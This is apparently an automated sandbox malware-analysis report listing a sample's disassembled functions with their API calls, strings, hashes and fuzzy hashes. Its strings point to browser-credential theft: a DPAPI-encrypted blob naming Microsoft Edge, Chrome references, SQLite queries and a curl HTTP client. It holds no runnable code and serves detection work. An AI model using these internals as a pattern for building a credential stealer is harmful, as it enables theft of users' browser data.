Opcode ID: 1f6bc1f582fd462189060d601a39ca52fccef732af9bdef38afba1db713833d5
Instruction ID: df1b456f197b0148416961bd7bf511cd2d5bc63991d22881fe708293a7415ac2
Opcode Fuzzy Hash: 1f6bc1f582fd462189060d601a39ca52fccef732af9bdef38afba1db713833d5
Instruction Fuzzy Hash: E751E271D003188FDB00DFA8D8457DEBBB5EF49314F5482AAE418AB381EB746A44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00404BE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,iS@,?,00404AA4,3A5313C3,iS@,00000008,00000000,0052C1A0,000000FF,?,00000000,811C9DC5,?,?,00405369), ref: 00404C1B
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(iS@,?,00404AA4,3A5313C3,iS@,00000008,00000000,0052C1A0,000000FF,?,00000000,811C9DC5,?,?,00405369), ref: 00404C34

Strings

iS@, xrefs: 00404BE3

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
String ID: iS@
API String ID: 356833432-1594713786
Opcode ID: 40aa81d895500ad5bb6500137a7e86d7c884484e15753733ff52a4a7a5ecbcb7
Instruction ID: 32bc1e13fe160923f2761ddaa5552672c55bc0f5974677db03fcbef0432eff3f
Opcode Fuzzy Hash: 40aa81d895500ad5bb6500137a7e86d7c884484e15753733ff52a4a7a5ecbcb7
Instruction Fuzzy Hash: DF113570204B108FD7289F2AE554717FBF5AF98304F06882ED58683BA0CBB5F84ACB54

Uniqueness

Uniqueness Score: -1.00%

Function 00477CC0 Relevance: 5.2, APIs: 4, Instructions: 226COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,?,0000001C,?,?), ref: 00477DD4
memmove.VCRUNTIME140(00000000,?,-00000030,?,?), ref: 00477DFD
memset.VCRUNTIME140(?,00000000,00000030,?,?,?,?,?), ref: 00477E15
memmove.VCRUNTIME140(?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00477E46

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$memset
String ID:
API String ID: 3790616698-0
Opcode ID: 114e777079e409810292d9429d2bf64460e3df2652739bced0955a8f18893fd3
Instruction ID: 6e96b78665d9cd4e1919160c9cd9f26cde951c90ed0cba9cb889e7e21ed8ca71
Opcode Fuzzy Hash: 114e777079e409810292d9429d2bf64460e3df2652739bced0955a8f18893fd3
Instruction Fuzzy Hash: 4681AC70A046099BEB14CFA4D881BEEB7B5FF88304F44852AE81997381D778AD45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004C8D40 Relevance: 4.8, APIs: 3, Instructions: 261COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 004C9022

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,20000007,?,?,?,?), ref: 004C901C
_CxxThrowException.VCRUNTIME140(00000000,00000000,?,?,?,?,3A5313C3,?,?,?), ref: 004C9046

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 3455115287-0
Opcode ID: a3b17a73cb440513ff7a68bcd00a268d2539550b8e7ed4b7328464b700d22e47
Instruction ID: 50c46f9cd3e622d9cb8fcb9016caa3a384dd0934d60670e24f206da9cf05ab3e
Opcode Fuzzy Hash: a3b17a73cb440513ff7a68bcd00a268d2539550b8e7ed4b7328464b700d22e47
Instruction Fuzzy Hash: D9B14AB5A002149FCB54DF68C984BAEBBF1FF49300F19816EE409AB391DB35AD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00468959 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,?,?), ref: 00468BA3

Strings

PSj, xrefs: 004689B6
@OD, xrefs: 0046895A

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove
String ID: @OD$PSj
API String ID: 2162964266-4110908479
Opcode ID: 3e5d253c5b46f1f220e2a98335c37d864f67f5acbd1ea45fa575761f8d16d505
Instruction ID: c59f195dba0af21c98d1aecd5540a981398f94a8960ad309eebb63c50f8590a0
Opcode Fuzzy Hash: 3e5d253c5b46f1f220e2a98335c37d864f67f5acbd1ea45fa575761f8d16d505
Instruction Fuzzy Hash: 6671A0B0A043418BDB18CF28C48576AB7A1BF44714F140A6FEC569B746EB79EC45CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 004842B0 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

duplicate column name: %s, xrefs: 00484447
too many columns on %s, xrefs: 004842DE

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID:
String ID: duplicate column name: %s$too many columns on %s
API String ID: 0-1445880494
Opcode ID: 58eeb82adc77038701ad299a0ad21d729dd179517f4ece2c3de5b0020f4a3c1c
Instruction ID: 03a90e9b626015262134493766507139dbc32913e83b7e209404daa6c7d74229
Opcode Fuzzy Hash: 58eeb82adc77038701ad299a0ad21d729dd179517f4ece2c3de5b0020f4a3c1c
Instruction Fuzzy Hash: 87514571E005169FCB15EF5994806FEFBB1FF89304B18419BEC889B302EB399951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004C4C90 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 142COMMON

Download Yara Rule

Strings

Error executing query: Unknown Error, xrefs: 004C4E6E
WQL, xrefs: 004C4CD0

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID:
String ID: Error executing query: Unknown Error$WQL
API String ID: 0-927338895
Opcode ID: 66fbf6b6800742af196964f9bb31620ac3203a90dabb1d68cade8ed34069a221
Instruction ID: 3c92a3ddb02d78a07098e4f7d24c68b249117ab5f2c29c81ebc549fe1a205f8a
Opcode Fuzzy Hash: 66fbf6b6800742af196964f9bb31620ac3203a90dabb1d68cade8ed34069a221
Instruction Fuzzy Hash: 2A410674A012159BDBA0EF54DA51FABBBB4FFC0710F10422EE815973D1EB38A900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00527F30 Relevance: 4.6, APIs: 3, Instructions: 128fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005280F0: CreateFileW.KERNELBASE(00000000,00000088,00000007,00000000,00000003,02200000,00000000,?,?,3A5313C3,00000000,?,00000000), ref: 0052818F
Part of subcall function 005280F0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000), ref: 005281CE
Part of subcall function 005280F0: GetLastError.KERNEL32(?,00000000), ref: 005281FB
Part of subcall function 005280F0: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00528214

CreateFileW.KERNELBASE(00000000,00000088,00000007,00000000,00000003,02000000,00000000,00000000,-00000002,?,?,?,00000000,00000000), ref: 00527FEE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000000), ref: 0052802D

Part of subcall function 00527DF0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00528269,?,00000000,?), ref: 00527E32

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00528086

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo_noreturn$AttributesCloseHandle
String ID:
API String ID: 2814195843-0
Opcode ID: d42ea23b5e4521a571321f0805c1ac6fc598c9c688583ae6be888544ddd21ce1
Instruction ID: 13be3d288cfb47ad4b9324c8b4c435019be46e87fda753ea212b891279040974
Opcode Fuzzy Hash: d42ea23b5e4521a571321f0805c1ac6fc598c9c688583ae6be888544ddd21ce1
Instruction Fuzzy Hash: 1141A071E01218DFDB14CFA8E989BEEBBB4FF49314F148119E915A7381DB346A04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00428DB0 Relevance: 4.6, APIs: 3, Instructions: 116COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,00000000,?,00000000,?,00000000,?,00000000), ref: 00428DE4
memmove.VCRUNTIME140(00000000,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00428E67
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,00000000,?,00000000), ref: 00428EBA

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2580228974-0
Opcode ID: fe64b1385d0655fb4ab550e89f0e759a307bfec40d362648f8392499814f9b2e
Instruction ID: 11839e118f9d7b3ef977cdf7bacb8ff98270a6a1d183d1997bf7fd78fae52ac8
Opcode Fuzzy Hash: fe64b1385d0655fb4ab550e89f0e759a307bfec40d362648f8392499814f9b2e
Instruction Fuzzy Hash: 1E313932B012249BC714EF78E8854AEB7B5FF85360B61066FF826D7390DB349D118795

Uniqueness

Uniqueness Score: -1.00%

Function 00403FD0 Relevance: 4.6, APIs: 3, Instructions: 97fileCOMMON

Download Yara Rule

APIs

?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 00403FED
memmove.VCRUNTIME140(?,?,00000000), ref: 0040405B
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 00404097

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ?xsputn@?$basic_streambuf@D@std@@@std@@U?$char_traits@fwritememmove
String ID:
API String ID: 804266185-0
Opcode ID: 850a996228eb6316e9840e3a8a5907fabcce5443b71915e66caeff4eff90e9e9
Instruction ID: 19f71d3c7228e8a5c7598bd50c041425cd129a393d7e367734d63ec6d6948a15
Opcode Fuzzy Hash: 850a996228eb6316e9840e3a8a5907fabcce5443b71915e66caeff4eff90e9e9
Instruction Fuzzy Hash: 5E3178B66002019BDB10CF2DC880A5BBBA9FFC4360F04852EFE54E7395D639D8148B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00418600 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

\Temp\tmp, xrefs: 00416EB7, 00418A26

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@TimeU?$char_traits@memchr$??1?$basic_ios@??1?$basic_ostream@FileSystemmemmovememset
String ID: \Temp\tmp
API String ID: 4222108042-1698746553
Opcode ID: ef0f349e2709dd58fcd38a0567d1dbd25112af95840e1e1b6a8f2220b47d4ac9
Instruction ID: 394c96bb2cc711c5a34ef4f7a07a2a3e6cb876464842f18efd667e2c71a321b1
Opcode Fuzzy Hash: ef0f349e2709dd58fcd38a0567d1dbd25112af95840e1e1b6a8f2220b47d4ac9
Instruction Fuzzy Hash: D1E17970901268EAEB25DB54CD4CBDEBBB5AF15308F1081DAD40867292DBB85FC8CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00422430 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

_vcomp_fork.VCOMP140(00000001,00000004,0052A5F0,?,?,00000004,?,?,RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4,RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4,?,Function_000047F0,?,?,Function_000047F0), ref: 00422607

Strings

RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4, xrefs: 0042253A, 0042253F, 0042255B, 0042256F, 00422576

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _vcomp_fork
String ID: RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4
API String ID: 3592199487-3264951547
Opcode ID: 429da8730f03ee6b29a3f63c022fa6d8db519db2b4367f957fdfaef5623b5bd9
Instruction ID: 10f5c4af116be0c0e35d5333244f8c4dc0f3ef42491bce0273a40b9d299d22dd
Opcode Fuzzy Hash: 429da8730f03ee6b29a3f63c022fa6d8db519db2b4367f957fdfaef5623b5bd9
Instruction Fuzzy Hash: 5A51C4B1E00219AFDB14CFA8D841AAEBBF5FF88314F14412EE515F7381D774A9008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00465970 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 281COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 0046599D

Strings

FOREIGN KEY constraint failed, xrefs: 00465A5E, 00465AF6

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memset
String ID: FOREIGN KEY constraint failed
API String ID: 2221118986-1894908324
Opcode ID: 530db3a241fea4ed9298ffd5fe54cf287c8846cfea4d4758703ac613d19e75b1
Instruction ID: 8f12bc046b55188f797ad7a99d46de912d312ad71a512ff2070483e55064f243
Opcode Fuzzy Hash: 530db3a241fea4ed9298ffd5fe54cf287c8846cfea4d4758703ac613d19e75b1
Instruction Fuzzy Hash: 75A19070700F419BEB25DA69C4957ABB3E1FB84308F18452FD84686782E77DA845CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 00438DD0 Relevance: 3.2, APIs: 2, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,00431FAF,?,00000000), ref: 00438FE0
Concurrency::cancel_current_task.LIBCPMT ref: 00438FE6

Part of subcall function 00401B80: _CxxThrowException.VCRUNTIME140(?,005553D0), ref: 00401B97
Part of subcall function 00401B80: __std_exception_copy.VCRUNTIME140(?,?,Google Chrome,?,?,005553D0), ref: 00401BBE

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_taskExceptionThrow__std_exception_copy_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 3060191141-0
Opcode ID: 7b67cbb34ff77e1e5b9680086fa381df85232ef8c8a7577335d6bdc9075e39b0
Instruction ID: 4040068d28a428cf687d6e75c8251656eb2221c84cc0fbdfd7340a96a9ad2e58
Opcode Fuzzy Hash: 7b67cbb34ff77e1e5b9680086fa381df85232ef8c8a7577335d6bdc9075e39b0
Instruction Fuzzy Hash: D5610671A006158FDB18DF28C995A6AF7B1AF88304F09526EE846AF391D774FE40CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00410090 Relevance: 3.2, APIs: 2, Instructions: 162COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?,3A5313C3), ref: 00410109
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(Function_00144378,00000000), ref: 0041026E

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: FolderPath_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2457504600-0
Opcode ID: 750e92225d4caf4bc5f0afc3669a655b8a6763156174ef361a9c2161fee27194
Instruction ID: 5a0046078858e01a646442df512f7562e281fc17c69e2ca5b9fae84f0396d686
Opcode Fuzzy Hash: 750e92225d4caf4bc5f0afc3669a655b8a6763156174ef361a9c2161fee27194
Instruction Fuzzy Hash: 2751C2709102189BEB29DF28CD497DEBBB5EB46304F1042DAE409AB2C1DBB95EC4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004C7E60 Relevance: 3.1, APIs: 2, Instructions: 132COMMON

Download Yara Rule

APIs

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,3A5313C3,00000001,?), ref: 004C7F34
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,3A5313C3,00000001,?), ref: 004C7FAB

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturnmalloctolower
String ID:
API String ID: 1094193817-0
Opcode ID: 638f6e76a81a5b8c57fa0cb4fe4d52317abfaf8840ad2ee38d1301e3f78d8cca
Instruction ID: 1bcbd9307c942613acc47dde4bdef8676b1fe780dab7151d8d901a6113ec57cb
Opcode Fuzzy Hash: 638f6e76a81a5b8c57fa0cb4fe4d52317abfaf8840ad2ee38d1301e3f78d8cca
Instruction Fuzzy Hash: 59517175A002099FCB04CF68C984BAEB7F5FF48314F14816EE81597390EB39AD45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004845F0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

default value of column [%s] is not constant, xrefs: 0048467A

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID:
String ID: default value of column [%s] is not constant
API String ID: 0-1822747983
Opcode ID: f56d7faf4fdd866355fa153ea50168e679bf430397485cebc00adb3d77a83035
Instruction ID: 5f9eec302104546f3e42f11f359ff1014e70800edb7d4f1322d1a9b5c67f63f0
Opcode Fuzzy Hash: f56d7faf4fdd866355fa153ea50168e679bf430397485cebc00adb3d77a83035
Instruction Fuzzy Hash: 5141A3706047029FC714EF25C891B6BB7E1BFC9304F148A2EE85947351EB78E945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041BC40 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

Part of subcall function 0052040F: _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520417
Part of subcall function 0052040F: _CxxThrowException.VCRUNTIME140(?,00554334,?), ref: 00521423

memset.VCRUNTIME140(00000000,00000000,00000108,?,00000001), ref: 0041BD37

Part of subcall function 004021C0: ?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Curl session is already initialized ! Use CleanupSession() to clean the present one.,00000068), ref: 00402236
Part of subcall function 004021C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040226B

Strings

`SC, xrefs: 0041BD43

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: ExceptionThrowXbad_function_call@std@@_callnewh_invalid_parameter_noinfo_noreturnmallocmemset
String ID: `SC
API String ID: 634466196-3386182799
Opcode ID: 59ca8921f626707eddf6dfc009e4904aced3d39a371719ea26c85168c0bff4f1
Instruction ID: c4171a8dfd51fab97f1da4cd4a206f8b1d1f8e06ab2c61582c0d41089b30a5da
Opcode Fuzzy Hash: 59ca8921f626707eddf6dfc009e4904aced3d39a371719ea26c85168c0bff4f1
Instruction Fuzzy Hash: A54160B0D00248EFDB10DFA9C945B9EBFF4AF19314F248269E414B72C2D7B456488BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004C81A0 Relevance: 3.1, APIs: 2, Instructions: 108COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000050,00000000,3A5313C3,00000000,3A5313C3,0000000F), ref: 004C8211
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0000000F,0000000F,00000000,00000000,3A5313C3,0000000F), ref: 004C82BE

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemset
String ID:
API String ID: 1654775311-0
Opcode ID: d5d4850075a15c7e753b4e32fb449cbf899b8ece67271b853c80f393645b8779
Instruction ID: bea3fec8480c807b392769e45256956ebd3e356858ab73f3f57c06fbcfdfebb5
Opcode Fuzzy Hash: d5d4850075a15c7e753b4e32fb449cbf899b8ece67271b853c80f393645b8779
Instruction Fuzzy Hash: 92410275E001089BEB14DFA8DD85FEEB775EF89310F50C65EE411A7281DB386A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004C43E0 Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

_com_issue_error.COMSUPP ref: 004C4472
SysFreeString.OLEAUT32(-00000001), ref: 004C44A0

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: FreeString_com_issue_errormalloc
String ID:
API String ID: 4121536334-0
Opcode ID: 934d186e89f3c5fa011558ec6ac28b6ecd178ee8939585d2e902c38e10ede964
Instruction ID: 20cb011ed07a94701a95172c86baf2d7379744dc497b1d1c8023ffcce00401f5
Opcode Fuzzy Hash: 934d186e89f3c5fa011558ec6ac28b6ecd178ee8939585d2e902c38e10ede964
Instruction Fuzzy Hash: B821E1B1901725ABD7209F59D805B57FBE8EF81B20F20872EE81897780E7B9A84087D5

Uniqueness

Uniqueness Score: -1.00%

Function 004C82F0 Relevance: 3.1, APIs: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004C81A0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0000000F,0000000F,00000000,00000000,3A5313C3,0000000F), ref: 004C82BE

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,3A5313C3,00000000,?,3A5313C3,00000000,3A5313C3), ref: 004C836D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000), ref: 004C83B4

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$strtol
String ID:
API String ID: 1666793430-0
Opcode ID: 4990aa494f713d3f7d69b4b2f3a11e2163835726f6d446d910323507a6763dca
Instruction ID: e8b13ee9622b1c05ce3d96865ee937b3da908de2a2f31579e4f142c44477f6b6
Opcode Fuzzy Hash: 4990aa494f713d3f7d69b4b2f3a11e2163835726f6d446d910323507a6763dca
Instruction Fuzzy Hash: 49317F75D00209DFDB04DFA8D855BEEBBB5EB18310F54822DE821A7690DB39A944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 023097C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 023097EE
Module32First.KERNEL32(00000000,00000224), ref: 0230980E

Memory Dump Source

Source File: 00000007.00000002.2704339035.0000000002309000.00000040.00000020.00020000.00000000.sdmp, Offset: 02309000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2309000_16E6.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 60da07f6887e63ce0ef64a506a649f15020f34af29f41723ac3a6f3136c672da
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 76F090322007106FD7203FF9A8DDB6F76ECAF89A29F100668E646911C1DB70E8458A75

Uniqueness

Uniqueness Score: -1.00%

Function 004299D0 Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(3A5313C3,?,00000000), ref: 00429A09
Concurrency::cancel_current_task.LIBCPMT ref: 00429A26

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

